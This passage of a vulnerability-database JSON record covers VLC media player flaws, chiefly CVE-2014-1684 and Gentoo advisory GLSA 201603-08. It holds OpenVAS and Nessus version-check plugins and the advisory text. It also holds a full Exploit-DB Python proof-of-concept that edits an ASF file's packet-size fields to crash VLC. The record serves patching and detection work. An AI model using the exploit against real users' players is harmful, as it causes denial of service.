value:\"2016-03-14 15:52:44 +0200 (Mon, 14 Mar 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201603-08\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in VLC. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201603-08\");\n script_cve_id(\"CVE-2014-1684\", \"CVE-2014-6440\", \"CVE-2014-9597\", \"CVE-2014-9598\", \"CVE-2014-9625\", \"CVE-2014-9626\", \"CVE-2014-9627\", \"CVE-2014-9628\", \"CVE-2014-9629\", \"CVE-2014-9630\", \"CVE-2015-1202\", \"CVE-2015-1203\", \"CVE-2015-5949\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201603-08\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"media-video/vlc\", unaffected: make_list(\"ge 2.2.1-r1\"), vulnerable: make_list(\"lt 2.2.1-r1\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T14:37:28", "description": "VLC 2.1.2 - (.asf) Crash PoC. CVE-2014-1684 . Dos exploits for multiple platform", "published": "2014-02-05T00:00:00", "type": "exploitdb", "title": "VLC 2.1.2 - .asf Crash PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1684"], "modified": "2014-02-05T00:00:00", "id": "EDB-ID:31429", "href": "https://www.exploit-db.com/exploits/31429/", "sourceData": "#!/usr/bin/python\r\n# VLC Media Player up to 2.1.2 DOS POC Integer Division By zero in ASF Demuxer\r\n# VLC Media Player is prone to DOS utilizing a division by zero error if minimium data packet size\r\n# is equal to zero. this was tested on windows XP sp3 and affects all versions of vlc till latest 2.1.2\r\n# to run this script you need to install python bitstring module \r\n# usage you supply any valid asf and the script will produxe a POC asf that will crash vlc \r\n\r\nimport sys\r\nfrom bitstring import BitArray\r\n\r\nf = open(sys.argv[1],'r+b')\r\n\r\nf.seek(0,2)\r\n\r\nsize = f.tell()\r\n\r\nprint \"[*] file size: %d\" % size\r\n\r\nf.seek(0,0)\r\n\r\nprint \"[*] ReeeeeWWWWWWiiiiiNNNNNNND\"\r\n\r\nfb = BitArray(f)\r\n\r\nindex = fb.find('0xa1dcab8c47a9cf118ee400c00c205365',bytealigned=True)\r\n\r\nprint \"[*] found file properties GUID\"\r\nprint \"[*] File properties GUID: %s\" % fb[index[0]:(index[0]+128)]\r\n\r\n# index of minumum packet size in File Proprties header\r\ni_min_data_pkt_size = index[0] + 736\r\n\r\nprint \"[*] Original Minimum Data Packet Size: %s\" % fb[i_min_data_pkt_size:i_min_data_pkt_size+32].hex\r\nprint \"[*] Original Maximum Data Packet Size: %s\" % fb[i_min_data_pkt_size+32:i_min_data_pkt_size+64].hex\r\n\r\n# Accroding to ASF standarad the minimum data size and the maximum data size should be equal\r\nprint \"[*] Changing Miniumum and Maximum Data packet size to 0\"\r\n\r\n# changing the data packets in bit array\r\n\r\nfb[i_min_data_pkt_size:i_min_data_pkt_size+8] = 0x00\r\nfb[i_min_data_pkt_size+8:i_min_data_pkt_size+16] = 0x00\r\nfb[i_min_data_pkt_size+16:i_min_data_pkt_size+24] = 0x00\r\nfb[i_min_data_pkt_size+24:i_min_data_pkt_size+32] = 0x00\r\nfb[i_min_data_pkt_size+32:i_min_data_pkt_size+40] = 0x00\r\nfb[i_min_data_pkt_size+40:i_min_data_pkt_size+48] = 0x00\r\nfb[i_min_data_pkt_size+48:i_min_data_pkt_size+56] = 0x00\r\nfb[i_min_data_pkt_size+56:i_min_data_pkt_size+64] = 0x00\r\n\r\nprint \"[*] POC File Created poc.asf\"\r\n\r\nof = open('poc.asf','w+b')\r\nfb.tofile(of)\r\nof.close()\r\nf.close()\r\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/31429/"}], "nessus": [{"lastseen": "2020-08-15T13:34:21", "description": "An exploitable denial of service vulnerability exists in ASF_ReadObject_file_properties function in modules/demux/asf/libasf.c in \nthe ASF Demuxer in VideoLAN VLC Media Player before 2.1.3. Allows remote attackers to cause a denial of service \n(divide-by-zero error and crash) via a zero minimum and maximum data packet size in an ASF file.", "edition": 3, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2020-06-11T00:00:00", "title": "VLC < 2.1.3 DoS Vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1684"], "modified": "2020-06-11T00:00:00", "cpe": ["cpe:/a:videolan:vlc_media_player"], "id": "VLC_2_1_3.NASL", "href": "https://www.tenable.com/plugins/nessus/137357", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137357);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/14\");\n\n script_cve_id(\"CVE-2014-1684\");\n script_bugtraq_id(65399);\n\n script_name(english:\"VLC < 2.1.3 DoS Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a media player that is affected by denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"An exploitable denial of service vulnerability exists in ASF_ReadObject_file_properties function in modules/demux/asf/libasf.c in \nthe ASF Demuxer in VideoLAN VLC Media Player before 2.1.3. Allows remote attackers to cause a denial of service \n(divide-by-zero error and crash) via a zero minimum and maximum data packet size in an ASF file.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.cvedetails.com/cve/CVE-2014-1684\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VLC version 2.1.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-1684\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:videolan:vlc_media_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vlc_installed.nasl\");\n script_require_keys(\"SMB/VLC/Version\", \"installed_sw/VLC media player\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp_info = vcf::get_app_info(app:'VLC media player', win_local:TRUE);\n\nconstraints = [{'fixed_version':'2.1.3'}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-12T11:04:57", "description": "The remote host is affected by the vulnerability described in GLSA-201603-08\n(VLC: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in VLC. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n Remote attackers could possibly execute arbitrary code or cause Denial\n of Service.\n \nWorkaround :\n\n There is no known work around at this time.", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-03-14T00:00:00", "title": "GLSA-201603-08 : VLC: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9629", "CVE-2015-1202", "CVE-2014-9627", "CVE-2014-6440", "CVE-2014-9625", "CVE-2015-1203", "CVE-2014-9628", "CVE-2015-5949", "CVE-2014-9626", "CVE-2014-1684", "CVE-2014-9598", "CVE-2014-9597", "CVE-2014-9630"], "modified": "2016-03-14T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:vlc"], "id": "GENTOO_GLSA-201603-08.NASL", "href": "https://www.tenable.com/plugins/nessus/89901", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201603-08.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89901);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-1684\", \"CVE-2014-6440\", \"CVE-2014-9597\", \"CVE-2014-9598\", \"CVE-2014-9625\", \"CVE-2014-9626\", \"CVE-2014-9627\", \"CVE-2014-9628\", \"CVE-2014-9629\", \"CVE-2014-9630\", \"CVE-2015-1202\", \"CVE-2015-1203\", \"CVE-2015-5949\");\n script_xref(name:\"GLSA\", value:\"201603-08\");\n\n script_name(english:\"GLSA-201603-08 : VLC: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201603-08\n(VLC: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in VLC. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n Remote attackers could possibly execute arbitrary code or cause Denial\n of Service.\n \nWorkaround :\n\n There is no known work around at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201603-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All VLC users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-video/vlc-2.2.1-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:vlc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-video/vlc\", unaffected:make_list(\"ge 2.2.1-r1\"), vulnerable:make_list(\"lt 2.2.1-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"VLC\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:07", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9629", "CVE-2015-1202", "CVE-2014-9627", "CVE-2014-6440", "CVE-2014-9625", "CVE-2015-1203", "CVE-2014-9628", "CVE-2015-5949", "CVE-2014-9626", "CVE-2014-1684", "CVE-2014-9598", "CVE-2014-9597", "CVE-2014-9630"], "description": "### Background\n\nVLC is a cross-platform media player and streaming server.\n\n### Description\n\nMultiple vulnerabilities have been discovered in VLC. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nRemote attackers could possibly execute arbitrary code or cause Denial of Service. \n\n### Workaround\n\nThere is no known work around at this time.\n\n### Resolution\n\nAll VLC users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-video/vlc-2.2.1-r1\"", "edition": 1, "modified": "2016-03-12T00:00:00", "published": "2016-03-12T00:00:00", "id": "GLSA-201603-08", "href": "https://security.gentoo.org/glsa/201603-08", "type": "gentoo", "title": "VLC: Multiple vulnerabilities", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}